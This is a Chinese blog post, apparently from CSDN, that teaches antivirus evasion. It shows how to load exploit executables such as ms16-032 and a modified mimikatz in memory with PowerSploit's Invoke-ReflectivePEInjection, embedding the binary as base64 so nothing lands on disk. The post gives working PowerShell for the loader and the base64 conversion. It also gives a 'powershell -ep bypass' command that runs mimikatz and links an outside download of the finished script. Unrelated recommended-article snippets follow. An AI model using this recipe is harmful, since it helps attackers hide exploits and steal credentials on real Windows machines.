.exp文件_有趣的命令行系列——利用PEloader加载exp从而绕过杀毒软件

最新推荐文章于 2021-11-20 18:09:52 发布
最新推荐文章于 2021-11-20 18:09:52 发布
阅读量366 收藏
点赞数
文章标签: .exp文件

黑客工具是渗透手在日常工作中必备的,很多黑客工具其实并不是木马或病毒,但是也被杀毒软件查杀,所以让自己手头的黑客工具躲过杀软也是渗透手的必要技能。

Poweshell有一个peloader脚本,地址在https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1。

这个工具如何调用exe呢?具体调用代码如下:

Import-Module .Invoke-ReflectivePEInjection.ps1$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

如下图所示(图中调用了ms16-032x64这个exp):

a1fc8fbdbe3548db4b7c2a48faea9d46.png

这样难免会有ms16-032x64.exe这个文件落地,还是会被杀的。我们要做的工作就是改造Invoke-ReflectivePEInjection.ps1这个脚本让exe消失不见。具体做法就是我们可以先把exe文件转为base64字符串放在powershell脚本中,再把base64字符串再转为Invoke-ReflectivePEInjection.ps1可以调用的字节码就可以了。

转换exe的base64的powershell脚本base.ps1代码如下:

function Convert-BinaryToString { [CmdletBinding()] param ( [string] $FilePath ) try { $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); } catch { throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray); } else { throw '$ByteArray is $null.'; } $Base64String | set-content ("b64.txt")}

具体做法如下图所示:

bb2d07e63ef698afdd72f3409792f1dc.png

生成base64的字符串并存储在b64.txt中。

然后我们就可以用新的命令来调用Invoke-ReflectivePEInjection.ps1了,先使用如下命令进行转换:

$InputString = "base64string"$PEBytes = [System.Convert]::FromBase64String($InputString)

之后就可以再使用原来的命令了

Invoke-ReflectivePEInjection -PEBytes $PEBytes

进行加载,最后分享一下最终的脚本http://haiyangtop.cn/mima64.ps1。

读者下载这个脚本后,你只需要把代码中的这一行$InputString = "base64string"这里的base64字符串替换一下为别的exe的base64字符串就可以了。不过经我测试似乎64位系统只能加载64位程序,32位系统未测试。

mima64.ps1这个脚本是我用mimikatz改造的,用法如下:

powershell -ep bypass -c "Import-Module c:mima.ps1;mima -command -p"

具体见效果如下:

b4a1c453f5de51e767cffbb5c3e233cc.png

本文写作参考了Evi1cg的文章,最后对原作者表示感谢。

weixin_39952074
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PELoaderLib
01-15
PELoaderLib, 顾名思义, PE文件加载器,允许您从缓冲区中加载EXE、DLL等PE文件.
exp.文件
m0_56959478的博客
06-15 533
#define _CRT_SECURE_NO_WARNINGS #include<stdio.h> #include<stdlib.h> #include<math.h> #include<string.h> int main(void) { FILE *infp; int num; char name[20]; int ret; if((infp = fopen("stud_info.csv","r"))==NULL) { printf("Ca.
PE Loader
pyq881120的专栏
07-17 1361
/* *LocalFile是对读文件操作的一个简单封装 */ //LocalFile.h #pragma once class CLocalFile { public: CLocalFile(const char * name); ~CLocalFile(void);
PE loader (x86)
zylg
11-20 996
#include <iostream> #include "PeLoader32.h" #include <fstream> using namespace std; string readFile(const string & _file_name) { fstream f(_file_name.data(), ios::in|ios::binary); f.seekg(0, ios::end); size_t len = f.tellg(); f.seekg(
.exp是什么文件格式
热门推荐
PengPengBlog的博客
08-18 1万+
exp文件是指导出库文件文件,简称导出库文件,它包含了导出函数和数据项的信息。当LIB创建一个导入库,同时它也创建一个导出库文件。如果你的程序链接到另一个程序,并且你的程序需要同时导出和导入到另一个程序中,这个时候就要使用到exp文件
PeLoader_汇编.zip
07-16
汇编PeLoader,内存加载DLL,内存调用DLL函数,专业,快速。
易语言学习-PE加载器(PeLoader)支持库版.zip
最新发布
07-09
易语言学习-PE加载器(PeLoader)支持库版.zip
汇编PeLoader_模块+例程
01-04
易语言:汇编PeLoader_模块+例程 内存加载DLL的实现
peloader.7z
11-20
熟悉一下pe加载过程
PE加载器1.7版(PeLoader_fne.fne)-易语言
06-13
PeLoader。 操作系统支持: Windows
peloader:PE二进制加载器示例代码,摘自efitools
05-16
我确认可以通过使用自己的PE加载器来绕过SecureBoot模式下的BS-> LoadImage()限制,并且已在efitools上实现( ) 。 这是无需使用BS-> LoadImage()即可加载和执行二进制文件的示例代码。
windows下的pe loader源代码
02-09
参考网上的一些资料写了一个pe loader,主要是通过把需要加载文件的所所有section加载到相应的RVA上,然后进行重定位处理、导入表和导出表处理、资源段处理。
PELoader加载PE文件(转载)
02-28
加载PE文件 支持用户态和内核态(转载)
Oracle中用exp/imp命令参数详解
weixin_33752045的博客
09-14 120
Oracle中用exp/imp命令参数详解【用 exp 数 据 导 出】:1 将数据库TEST完全导出,用户名system 密码manager 导出到D:\daochu.dmp中expsystem/manager@TEST rows=y indexes=y compress=n buffer=65536 feedback=100000full=y fil...
exp java是什么文件怎么打开_exp文件扩展名,exp文件怎么打开?
weixin_33391446的博客
02-27 1164
.exp文件类型1:SonicWALL Preference File文件说明:Stores configuration information and custom settings for a SonicWALL firewall; may be exported and loaded by another system to transfer firewall settings; named...
仿照windows的loader实现的pe-loader
mergerly的专栏
01-19 4428
<br />   本人接触pe文件格式不久,参考网上的一些资料写了一个pe loader,主要是通过把需要加载文件的所所有section加载到相应的RVA上,然后进行重定位处理、导入表和导出表处理、资源段处理。由于本loader.exe会被加载到0x0f400000处,因此可以把0x400000给被加载文件预留了,这样可以避免重定位所带来的性能损耗。导入表的处理主要是通过调用GetProcAddress获取导入表中函数的地址。导出表一般仅在dll中使用,而此主要是用于load exe文件,所以不用做任何
Win7 内核重载 1 ——内核版PELoader
zfdyq
12-19 8309
重载重点,其实就是自己实现一个山寨版的Windows PELoader  ,重载其实就是将一个模块自己重新加载一份到别的内存,运行它。 所谓内核重载,则是将内核文件即:ntkrnlpa.exe 自己加载一份到内存,并运行它,这样的好处可以避免一切HOOK,如SSDT ,InLineHook 等等,原理就是HOOK继续 HOOK主原来内核,但是实际上Windows走的是我们自己的内核。
.exp文件_expexpdp的主要区别及常用的导入导出操作
weixin_39719042的博客
11-27 767
expexpdp的主要区别EXP和IMP是客户端工具程序,它们既可以在客户端使用,也可以在服务端使用。EXPDP和IMPDP是服务端的工具程序,他们只能在ORACLE服务端使用,不能在客户端使用常用的导入导出操作:exp system/manager buffer=缓冲大小(1024-4096) file=备份文件名(*.dmp) full=y system/manager登录名和密码expdp...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值